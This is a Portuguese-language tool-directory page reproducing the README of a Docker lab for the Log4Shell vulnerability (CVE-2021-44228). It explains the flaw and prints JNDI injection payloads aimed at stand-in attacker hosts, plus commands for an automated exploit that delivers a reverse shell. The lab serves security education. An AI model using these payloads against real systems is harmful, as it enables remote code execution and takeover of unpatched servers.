Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EXPLOIT-CVE-2021-44228 — Laboratório educacional baseado em Docker demonstrando exploração de RCE Log4Shell (CVE-2021-44228) com uma aplicação Java vulnerável, redirecionador LDAP e script de exploração automatizado. | Kitploit
Ferramentas/GitHubGitHub/joaovicdev/exploit-cve-2021-44228
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubjoaovicdev/exploit-cve-2021-44228

EXPLOIT-CVE-2021-44228

Laboratório educacional baseado em Docker demonstrando exploração de RCE Log4Shell (CVE-2021-44228) com uma aplicação Java vulnerável, redirecionador LDAP e script de exploração automatizado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
4há 5 mesesAinda não revisado
Compartilhar

CVE-2021-44228 — Log4Shell PoC Lab

DISCLAIMER

Este laboratório foi criado exclusivamente para fins educacionais e de pesquisa em segurança. Todo o tráfego ocorre dentro de uma rede Docker isolada. Não utilize este material em sistemas reais ou sem autorização explícita. O uso indevido pode ser crime. Use com responsabilidade.


O que é a CVE-2021-44228?

A Log4Shell é uma vulnerabilidade crítica (CVSS 10.0) descoberta em dezembro de 2021 na biblioteca de logging Apache Log4j 2, amplamente usada em aplicações Java.

Como a vulnerabilidade ocorre

O Log4j possui um recurso de interpolação de expressões: ao registrar uma mensagem, ele avalia strings no formato ${...}. Por exemplo, ${java:version} é substituído pela versão do Java em tempo de execução.

O problema está no suporte ao protocolo JNDI (Java Naming and Directory Interface). Quando o Log4j encontra uma expressão como:

root@kitploit:~
${jndi:ldap://atacante.com/exploit}

ele instrui a JVM a fazer uma consulta LDAP ao servidor do atacante. O servidor responde com uma referência a uma classe Java remota — e a JVM , resultando em .

baixa e executa essa classe
Remote Code Execution (RCE)

O vetor de ataque é simples: qualquer campo que seja logado pelo servidor (headers HTTP, campos de formulário, cookies, etc.) pode ser o ponto de entrada do payload.

Versões afetadas

  • Log4j 2.0-beta9 até 2.14.1
  • Corrigido na versão 2.15.0 (e definitivamente em 2.17.0)

Ambiente Vulnerável

O lab simula uma aplicação Java real usando as versões vulneráveis.

ComponenteVersãoPor quê é vulnerável
Apache Log4j2.14.1Avalia ${jndi:...} sem restrições
JDK1.8.0_181Anterior ao patch 8u191 que define trustURLCodebase=false
Spring Boot2.5.6Apenas o framework web; a vuln é do Log4j

Endpoint vulnerável

root@kitploit:~
GET http://localhost:8080/log

Os seguintes headers são logados diretamente pelo Log4j — qualquer um deles pode ser o vetor de injeção:

  • X-Api-Version
  • User-Agent
  • X-Auth-Token

Infraestrutura do atacante (container attacker)

ServiçoPortaFunção
marshalsec (LDAP)1389Recebe o lookup JNDI e redireciona para o HTTP server
Python HTTP server8888Serve o Exploit.class para a JVM da vítima
netcat listener9001Recebe a conexão do reverse shell

Como usar o exploit

Pré-requisitos

  • Docker e Docker Compose instalados
  • Node.js instalado (para o exploit)

1. Subir o ambiente completo

root@kitploit:~
docker-compose up --build

Aguarde até ver nos logs:

root@kitploit:~
[*] Waiting for reverse shell on :9001 ...
Started Application in X seconds

2. Disparar o exploit

Em outro terminal, rode o exploit Node.js:

root@kitploit:~
node exploit/exploit.js

Saída esperada:

root@kitploit:~
[*] CVE-2021-44228 — Log4Shell PoC
[*] Target  : http://localhost:8080/log
[*] Header  : X-Api-Version
[*] Payload : ${jndi:ldap://attacker:1389/Exploit}

[+] Response : 200 OK
[+] Body     : logged

[+] Payload delivered — check the attacker nc listener on port 9001

3. Verificar a execução

Observe o terminal onde o docker-compose está rodando. Nos logs do container attacker você verá a conexão do reverse shell chegando na porta 9001.

Para confirmar o touch /tmp/pwned dentro da app vulnerável:

root@kitploit:~
docker exec -it log4j-cve-2021-44228-vulnerable-app-1 ls /tmp/pwned

Argumentos customizados (opcionais)

root@kitploit:~
# node exploit/exploit.js [target] [ldapHost] [ldapPort] [className] [header]
node exploit/exploit.js http://localhost:8080/log attacker 1389 Exploit "User-Agent"

By Guaxinim | Cyber Security Research

Baixar ferramenta